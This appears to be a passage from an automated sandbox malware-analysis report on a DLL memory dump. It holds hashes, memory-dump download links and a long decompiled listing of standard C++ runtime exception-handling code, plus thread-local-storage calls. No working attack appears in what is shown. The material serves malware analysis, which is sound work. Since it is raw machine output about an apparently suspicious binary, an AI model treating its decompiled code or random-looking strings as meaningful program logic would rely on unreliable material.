                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AcquireLockSharedValue
                          • String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
                          • API String ID: 942675266-244047474
                          • Opcode ID: b2823dac8c086ebfb2ea2f34a31d7eee99c0d72536248f2279e22cc006ec18ab
                          • Instruction ID: 65bd3772a166eb15d77a0b3e91268fda04dd49018d1c3467b3bef2295c0e07de
                          • Opcode Fuzzy Hash: b2823dac8c086ebfb2ea2f34a31d7eee99c0d72536248f2279e22cc006ec18ab
                          • Instruction Fuzzy Hash: D00224B0E002199FDB10CFE4C994BDEBBB5FF45308F108569D615AB284E776A94ACF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECED036, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON
                          Download Yara Rule
                          C-Code - Quality: 64%
                          			E6ECED036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6ECEDF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6ECEF563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6ECECCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6ECECCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6ECEC537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6ECEC46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6ECECFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6ECEF563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
													_t210 = _t210 + 2;
													__eflags = _t278;
													if(_t278 != 0) {
														continue;
													} else {
														goto L96;
													}
												}
											}
											L98:
											__eflags = _t211;
											if(_t211 == 0) {
												goto L100;
											} else {
												_t208 = 0;
											}
											goto L109;
										}
										asm("sbb eax, eax");
										_t211 = _t210 | 0x00000001;
										__eflags = _t211;
										goto L98;
									}
								} else {
									__eflags =  *_t308 & 0x00000010;
									if(( *_t308 & 0x00000010) != 0) {
										goto L108;
									} else {
										goto L90;
									}
								}
							}
						}
						L109:
						return _t208;
					}
				} else {
					_t274 = _a4;
					if( *_t274 != 0xe06d7363 || _t274[0x10] != 3 || _t274[0x14] != 0x19930520 && _t274[0x14] != 0x19930521 && _t274[0x14] != 0x19930522) {
						L22:
						_t300 = _a12;
						_v8 = _t300;
						goto L24;
					} else {
						_t319 = 0;
						if(_t274[0x1c] != 0) {
							goto L22;
						} else {
							_t225 = E6ECECCF1(_t274, _t279, _t300, _t305, 0);
							if( *((intOrPtr*)(_t225 + 0x10)) == 0) {
								L60:
								return _t225;
							} else {
								_t274 =  *(E6ECECCF1(_t274, _t279, _t300, _t305, 0) + 0x10);
								_t263 = E6ECECCF1(_t274, _t279, _t300, _t305, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t263 + 0x14));
								if(_t274 == 0 ||  *_t274 == 0xe06d7363 && _t274[0x10] == 3 && (_t274[0x14] == 0x19930520 || _t274[0x14] == 0x19930521 || _t274[0x14] == 0x19930522) && _t274[0x1c] == _t319) {
									goto L66;
								} else {
									if( *((intOrPtr*)(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c)) == _t319) {
										L23:
										_t300 = _v8;
										_t279 = _v12;
										L24:
										_v52 = _t305;
										_v48 = 0;
										__eflags =  *_t274 - 0xe06d7363;
										if( *_t274 != 0xe06d7363) {
											L56:
											__eflags = _t305[3];
											if(_t305[3] <= 0) {
												goto L59;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L66;
												} else {
													_push(_a32);
													_push(_a28);
													_push(_t279);
													_push(_t305);
													_push(_a16);
													_push(_t300);
													_push(_a8);
													_push(_t274);
													L67();
													_t335 = _t335 + 0x20;
													goto L59;
												}
											}
										} else {
											__eflags = _t274[0x10] - 3;
											if(_t274[0x10] != 3) {
												goto L56;
											} else {
												__eflags = _t274[0x14] - 0x19930520;
												if(_t274[0x14] == 0x19930520) {
													L29:
													_t319 = _a32;
													__eflags = _t305[3];
													if(_t305[3] > 0) {
														_push(_a28);
														E6ECEC46A(_t274, _t279, _t305, _t319,  &_v68,  &_v52, _t279, _a16, _t305);
														_t300 = _v64;
														_t335 = _t335 + 0x18;
														_t250 = _v68;
														_v44 = _t250;
														_v16 = _t300;
														__eflags = _t300 - _v56;
														if(_t300 < _v56) {
															_t294 = _t300 * 0x14;
															__eflags = _t294;
															_v32 = _t294;
															do {
																_t295 = 5;
																_t253 = memcpy( &_v104,  *((intOrPtr*)( *_t250 + 0x10)) + _t294, _t295 << 2);
																_t335 = _t335 + 0xc;
																__eflags = _v104 - _t253;
																if(_v104 <= _t253) {
																	__eflags = _t253 - _v100;
																	if(_t253 <= _v100) {
																		_t298 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t255 =  *(_t274[0x1c] + 0xc);
																			_t303 =  *_t255;
																			_t256 =  &(_t255[1]);
																			__eflags = _t256;
																			_v36 = _t256;
																			_t257 = _v88;
																			_v40 = _t303;
																			_v24 = _t257;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t318 = _v36;
																				_t330 = _t303;
																				__eflags = _t330;
																				if(_t330 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_push(_t274[0x1c]);
																						_t258 =  &_v84;
																						_push( *_t318);
																						_push(_t258);
																						L86();
																						_t335 = _t335 + 0xc;
																						__eflags = _t258;
																						if(_t258 != 0) {
																							break;
																						}
																						_t330 = _t330 - 1;
																						_t318 = _t318 + 4;
																						__eflags = _t330;
																						if(_t330 > 0) {
																							continue;
																						} else {
																							_t298 = _v20;
																							_t257 = _v24;
																							_t303 = _v40;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					E6ECECFB6(_t303, _t274, _a8, _v8, _a16, _a20,  &_v84,  *_t318,  &_v104, _a28, _a32);
																					_t335 = _t335 + 0x30;
																				}
																				L43:
																				_t300 = _v16;
																				goto L44;
																				L40:
																				_t298 = _t298 + 1;
																				_t257 = _t257 + 0x10;
																				_v20 = _t298;
																				_v24 = _t257;
																				__eflags = _t298 - _v92;
																			} while (_t298 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t300 = _t300 + 1;
																_t250 = _v44;
																_t294 = _v32 + 0x14;
																_v16 = _t300;
																_v32 = _t294;
																__eflags = _t300 - _v56;
															} while (_t300 < _v56);
															_t305 = _a20;
															_t319 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E6ECECA71(_t274, _t305, _t319, __eflags);
														_t279 = _t274;
													}
													__eflags = ( *_t305 & 0x1fffffff) - 0x19930521;
													if(( *_t305 & 0x1fffffff) < 0x19930521) {
														L59:
														_t225 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
														__eflags =  *(_t225 + 0x1c);
														if( *(_t225 + 0x1c) != 0) {
															goto L66;
														} else {
															goto L60;
														}
													} else {
														__eflags = _t305[7];
														if(_t305[7] != 0) {
															L52:
															_t229 = _t305[8] >> 2;
															__eflags = _t229 & 0x00000001;
															if((_t229 & 0x00000001) == 0) {
																_push(_t305[7]);
																_t230 = E6ECEDA45(_t274, _t305, _t319, _t274);
																_pop(_t279);
																__eflags = _t230;
																if(_t230 == 0) {
																	goto L63;
																} else {
																	goto L59;
																}
															} else {
																 *(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
																_t238 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
																_t290 = _v8;
																 *((intOrPtr*)(_t238 + 0x14)) = _v8;
																goto L61;
															}
														} else {
															_t245 = _t305[8] >> 2;
															__eflags = _t245 & 0x00000001;
															if((_t245 & 0x00000001) == 0) {
																goto L59;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L59;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _t274[0x14] - 0x19930521;
													if(_t274[0x14] == 0x19930521) {
														goto L29;
													} else {
														__eflags = _t274[0x14] - 0x19930522;
														if(_t274[0x14] != 0x19930522) {
															goto L56;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x1c));
										_t268 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
										_push(_v16);
										 *(_t268 + 0x1c) = _t319;
										_t269 = E6ECEDA45(_t274, _t305, _t319, _t274);
										_pop(_t290);
										if(_t269 != 0) {
											goto L23;
										} else {
											_t305 = _v16;
											_t356 =  *_t305 - _t319;
											if( *_t305 <= _t319) {
												L61:
												E6ECEF50C(_t274, _t290, _t300, _t305, _t319, __eflags);
											} else {
												while(1) {
													_t290 =  *((intOrPtr*)(_t319 + _t305[1] + 4));
													if(E6ECED6D9( *((intOrPtr*)(_t319 + _t305[1] + 4)), _t356, 0x6ed2ad60) != 0) {
														goto L62;
													}
													_t319 = _t319 + 0x10;
													_t273 = _v20 + 1;
													_v20 = _t273;
													_t356 = _t273 -  *_t305;
													if(_t273 >=  *_t305) {
														goto L61;
													} else {
														continue;
													}
													goto L62;
												}
											}
											L62:
											_push(1);
											_push(_t274);
											E6ECECA71(_t274, _t305, _t319, __eflags);
											_t279 =  &_v64;
											E6ECED6C1( &_v64);
											E6ECEC29C( &_v64, 0x6ed27f7c);
											L63:
											 *(E6ECECCF1(_t274, _t279, _t300, _t305, _t319) + 0x10) = _t274;
											_t232 = E6ECECCF1(_t274, _t279, _t300, _t305, _t319);
											_t279 = _v8;
											 *(_t232 + 0x14) = _v8;
											__eflags = _t319;
											if(_t319 == 0) {
												_t319 = _a8;
											}
											E6ECEC65D(_t279, _t319, _t274);
											E6ECED945(_a8, _a16, _t305);
											_t235 = E6ECEDB02(_t305);
											_t335 = _t335 + 0x10;
											_push(_t235);
											E6ECED8BC(_t274, _t279, _t300, _t305, _t319, __eflags);
											goto L66;
										}
									}
								}
							}
						}
					}
				}
			}























































































                          0x6eced036
                          0x6eced03d
                          0x6eced03f
                          0x6eced048
                          0x6eced04e
                          0x6eced056
                          0x6eced058
                          0x6eced05b
                          0x6eced061
                          0x6eced3da
                          0x6eced3da
                          0x6eced3df
                          0x6eced3e1
                          0x6eced3e3
                          0x6eced3e6
                          0x6eced3e7
                          0x6eced3ea
                          0x6eced3f0
                          0x6eced50f
                          0x6eced3f6
                          0x6eced3f6
                          0x6eced3f7
                          0x6eced3f8
                          0x6eced3ff
                          0x6eced402
                          0x6eced405
                          0x6eced40b
                          0x6eced40d
                          0x6eced412
                          0x6eced415
                          0x6eced417
                          0x6eced41d
                          0x6eced41f
                          0x6eced425
                          0x6eced43a
                          0x6eced43f
                          0x6eced442
                          0x6eced444
                          0x6eced50b
                          0x00000000
                          0x6eced50c
                          0x6eced444
                          0x6eced425
                          0x6eced41d
                          0x6eced415
                          0x6eced44a
                          0x6eced44d
                          0x6eced450
                          0x6eced453
                          0x6eced456
                          0x6eced45c
                          0x6eced46e
                          0x6eced473
                          0x6eced476
                          0x6eced479
                          0x6eced47c
                          0x6eced47f
                          0x6eced482
                          0x6eced485
                          0x00000000
                          0x00000000
                          0x6eced48b
                          0x6eced48b
                          0x6eced48e
                          0x6eced491
                          0x6eced4a0
                          0x6eced4a1
                          0x6eced4a1
                          0x6eced4a3
                          0x6eced4a6
                          0x00000000
                          0x00000000
                          0x6eced4a8
                          0x6eced4ab
                          0x00000000
                          0x00000000
                          0x6eced4b9
                          0x6eced4bb
                          0x6eced4be
                          0x6eced4c0
                          0x6eced4c8
                          0x6eced4c8
                          0x6eced4cb
                          0x6eced4cd
                          0x6eced4cf
                          0x6eced4eb
                          0x6eced4f0
                          0x6eced4f3
                          0x6eced4f3
                          0x00000000
                          0x6eced4cb
                          0x6eced4c2
                          0x6eced4c6
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced4f6
                          0x6eced4f9
                          0x6eced4fa
                          0x6eced4fd
                          0x6eced500
                          0x6eced503
                          0x6eced506
                          0x6eced506
                          0x00000000
                          0x6eced491
                          0x6eced510
                          0x6eced515
                          0x6eced516
                          0x6eced519
                          0x6eced51c
                          0x6eced51d
                          0x6eced51e
                          0x6eced51f
                          0x6eced522
                          0x6eced524
                          0x6eced59c
                          0x6eced59e
                          0x6eced59e
                          0x6eced526
                          0x6eced526
                          0x6eced529
                          0x6eced52c
                          0x00000000
                          0x6eced52e
                          0x6eced52e
                          0x6eced531
                          0x6eced534
                          0x6eced53b
                          0x6eced53b
                          0x6eced53e
                          0x6eced540
                          0x6eced542
                          0x6eced574
                          0x6eced574
                          0x6eced577
                          0x6eced57e
                          0x6eced57e
                          0x6eced581
                          0x6eced584
                          0x6eced58b
                          0x6eced58b
                          0x6eced58e
                          0x6eced595
                          0x6eced597
                          0x6eced597
                          0x6eced590
                          0x6eced590
                          0x6eced593
                          0x00000000
                          0x00000000
                          0x6eced593
                          0x6eced586
                          0x6eced586
                          0x6eced589
                          0x00000000
                          0x00000000
                          0x6eced589
                          0x6eced579
                          0x6eced579
                          0x6eced57c
                          0x00000000
                          0x00000000
                          0x6eced57c
                          0x6eced598
                          0x6eced544
                          0x6eced544
                          0x6eced544
                          0x6eced547
                          0x6eced547
                          0x6eced549
                          0x6eced54b
                          0x00000000
                          0x00000000
                          0x6eced54d
                          0x6eced54f
                          0x6eced563
                          0x6eced563
                          0x6eced551
                          0x6eced551
                          0x6eced554
                          0x6eced557
                          0x00000000
                          0x6eced559
                          0x6eced559
                          0x6eced55c
                          0x6eced55f
                          0x6eced561
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced561
                          0x6eced557
                          0x6eced56c
                          0x6eced56c
                          0x6eced56e
                          0x00000000
                          0x6eced570
                          0x6eced570
                          0x6eced570
                          0x00000000
                          0x6eced56e
                          0x6eced567
                          0x6eced569
                          0x6eced569
                          0x00000000
                          0x6eced569
                          0x6eced536
                          0x6eced536
                          0x6eced539
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced539
                          0x6eced534
                          0x6eced52c
                          0x6eced59f
                          0x6eced5a3
                          0x6eced5a3
                          0x6eced070
                          0x6eced070
                          0x6eced079
                          0x6eced176
                          0x6eced176
                          0x6eced179
                          0x00000000
                          0x6eced0a8
                          0x6eced0a8
                          0x6eced0ad
                          0x00000000
                          0x6eced0b3
                          0x6eced0b3
                          0x6eced0bb
                          0x6eced374
                          0x6eced378
                          0x6eced0c1
                          0x6eced0c6
                          0x6eced0c9
                          0x6eced0ce
                          0x6eced0d5
                          0x6eced0da
                          0x00000000
                          0x6eced112
                          0x6eced11a
                          0x6eced17e
                          0x6eced17e
                          0x6eced181
                          0x6eced184
                          0x6eced186
                          0x6eced189
                          0x6eced18c
                          0x6eced192
                          0x6eced343
                          0x6eced343
                          0x6eced346
                          0x00000000
                          0x6eced348
                          0x6eced348
                          0x6eced34b
                          0x00000000
                          0x6eced351
                          0x6eced351
                          0x6eced354
                          0x6eced357
                          0x6eced358
                          0x6eced359
                          0x6eced35c
                          0x6eced35d
                          0x6eced360
                          0x6eced361
                          0x6eced366
                          0x00000000
                          0x6eced366
                          0x6eced34b
                          0x6eced198
                          0x6eced198
                          0x6eced19c
                          0x00000000
                          0x6eced1a2
                          0x6eced1a2
                          0x6eced1a9
                          0x6eced1c1
                          0x6eced1c1
                          0x6eced1c4
                          0x6eced1c7
                          0x6eced1cd
                          0x6eced1dd
                          0x6eced1e2
                          0x6eced1e5
                          0x6eced1e8
                          0x6eced1eb
                          0x6eced1ee
                          0x6eced1f1
                          0x6eced1f4
                          0x6eced1fa
                          0x6eced1fa
                          0x6eced1fd
                          0x6eced200
                          0x6eced20f
                          0x6eced210
                          0x6eced210
                          0x6eced212
                          0x6eced215
                          0x6eced21b
                          0x6eced21e
                          0x6eced224
                          0x6eced226
                          0x6eced229
                          0x6eced22c
                          0x6eced235
                          0x6eced238
                          0x6eced23a
                          0x6eced23a
                          0x6eced23d
                          0x6eced240
                          0x6eced243
                          0x6eced246
                          0x6eced249
                          0x6eced24e
                          0x6eced24f
                          0x6eced250
                          0x6eced251
                          0x6eced252
                          0x6eced255
                          0x6eced257
                          0x6eced259
                          0x00000000
                          0x6eced25b
                          0x6eced25b
                          0x6eced25b
                          0x6eced25e
                          0x6eced261
                          0x6eced263
                          0x6eced264
                          0x6eced269
                          0x6eced26c
                          0x6eced26e
                          0x00000000
                          0x00000000
                          0x6eced270
                          0x6eced271
                          0x6eced274
                          0x6eced276
                          0x00000000
                          0x6eced278
                          0x6eced278
                          0x6eced27b
                          0x6eced27e
                          0x00000000
                          0x6eced27e
                          0x00000000
                          0x6eced276
                          0x6eced292
                          0x6eced298
                          0x6eced2b5
                          0x6eced2ba
                          0x6eced2ba
                          0x6eced2bd
                          0x6eced2bd
                          0x00000000
                          0x6eced281
                          0x6eced281
                          0x6eced282
                          0x6eced285
                          0x6eced288
                          0x6eced28b
                          0x6eced28b
                          0x00000000
                          0x6eced290
                          0x6eced22c
                          0x6eced21e
                          0x6eced2c0
                          0x6eced2c3
                          0x6eced2c4
                          0x6eced2c7
                          0x6eced2ca
                          0x6eced2cd
                          0x6eced2d0
                          0x6eced2d0
                          0x6eced2d9
                          0x6eced2dc
                          0x6eced2dc
                          0x6eced1f4
                          0x6eced2df
                          0x6eced2e3
                          0x6eced2e5
                          0x6eced2e8
                          0x6eced2ee
                          0x6eced2ee
                          0x6eced2f6
                          0x6eced2fb
                          0x6eced369
                          0x6eced369
                          0x6eced36e
                          0x6eced372
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced2fd
                          0x6eced2fd
                          0x6eced301
                          0x6eced313
                          0x6eced316
                          0x6eced319
                          0x6eced31b
                          0x6eced332
                          0x6eced336
                          0x6eced33c
                          0x6eced33d
                          0x6eced33f
                          0x00000000
                          0x6eced341
                          0x00000000
                          0x6eced341
                          0x6eced31d
                          0x6eced322
                          0x6eced325
                          0x6eced32a
                          0x6eced32d
                          0x00000000
                          0x6eced32d
                          0x6eced303
                          0x6eced306
                          0x6eced309
                          0x6eced30b
                          0x00000000
                          0x6eced30d
                          0x6eced30d
                          0x6eced311
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced311
                          0x6eced30b
                          0x6eced301
                          0x6eced1ab
                          0x6eced1ab
                          0x6eced1b2
                          0x00000000
                          0x6eced1b4
                          0x6eced1b4
                          0x6eced1bb
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6eced1bb
                          0x6eced1b2
                          0x6eced1a9
                          0x6eced19c
                          0x6eced11c
                          0x6eced124
                          0x6eced127
                          0x6eced12c
                          0x6eced130
                          0x6eced133
                          0x6eced139
                          0x6eced13c
                          0x00000000
                          0x6eced13e
                          0x6eced13e
                          0x6eced141
                          0x6eced143
                          0x6eced379
                          0x6eced379
                          0x00000000
                          0x6eced149
                          0x6eced151
                          0x6eced15c
                          0x00000000
                          0x00000000
                          0x6eced165
                          0x6eced168
                          0x6eced169
                          0x6eced16c
                          0x6eced16e
                          0x00000000
                          0x6eced174
                          0x00000000
                          0x6eced174
                          0x00000000
                          0x6eced16e
                          0x6eced149
                          0x6eced37e
                          0x6eced37e
                          0x6eced380
                          0x6eced381
                          0x6eced388
                          0x6eced38b
                          0x6eced399
                          0x6eced39e
                          0x6eced3a3
                          0x6eced3a6
                          0x6eced3ab
                          0x6eced3ae
                          0x6eced3b1
                          0x6eced3b3
                          0x6eced3b5
                          0x6eced3b5
                          0x6eced3ba
                          0x6eced3c6
                          0x6eced3cc
                          0x6eced3d1
                          0x6eced3d4
                          0x6eced3d5
                          0x00000000
                          0x6eced3d5
                          0x6eced13c
                          0x6eced11a
                          0x6eced0da
                          0x6eced0bb
                          0x6eced0ad
                          0x6eced079

                          APIs
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6ECED133
                          • type_info::operator==.LIBVCRUNTIME ref: 6ECED155
                          • ___TypeMatch.LIBVCRUNTIME ref: 6ECED264
                          • IsInExceptionSpec.LIBVCRUNTIME ref: 6ECED336
                          • _UnwindNestedFrames.LIBCMT ref: 6ECED3BA
                          • CallUnexpected.LIBVCRUNTIME ref: 6ECED3D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2123188842-393685449
                          • Opcode ID: a50ec9151e3c74ec3319d2d329bb698ef8d34e78dd3b89d1efcd98b3f4590d90
                          • Instruction ID: e29b7244e23cc65f1919fbe58de170931f53d29753369f09c1f3a3b53608b069
                          • Opcode Fuzzy Hash: a50ec9151e3c74ec3319d2d329bb698ef8d34e78dd3b89d1efcd98b3f4590d90
                          • Instruction Fuzzy Hash: 8BB1677180024AEFCF05CFE4C98199EBFB9FF84314B10455AE8146BA19E331DA51CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDC500, Relevance: 12.6, APIs: 10, Instructions: 125COMMON
                          Download Yara Rule
                          APIs
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC53A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC547
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC58A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC597
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC5CA
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC5D7
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC60A
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC617
                          • TlsGetValue.KERNEL32(?), ref: 6ECDC64B
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6ECDC658
                          Memory Dump Source
                          • Source File: 00000002.00000002.620774109.000000006ECD1000.00000020.00020000.sdmp, Offset: 6ECD0000, based on PE: true
                          • Associated: 00000002.00000002.620767364.000000006ECD0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620795378.000000006ECF8000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620819209.000000006ED2A000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620827085.000000006ED2C000.00000008.00020000.sdmp Download File
                          • Associated: 00000002.00000002.620833957.000000006ED2D000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: Value
                          • String ID:
                          • API String ID: 3702945584-0
                          • Opcode ID: ba70f20847e7e4e99effd72b961d36e64acc68ef87d021c5d91c37f7dcc6bcbf
                          • Instruction ID: 3a94f7902585b0dda4796c0a46ef4170d90c2379940ee92e0df9653b94350c18
                          • Opcode Fuzzy Hash: ba70f20847e7e4e99effd72b961d36e64acc68ef87d021c5d91c37f7dcc6bcbf
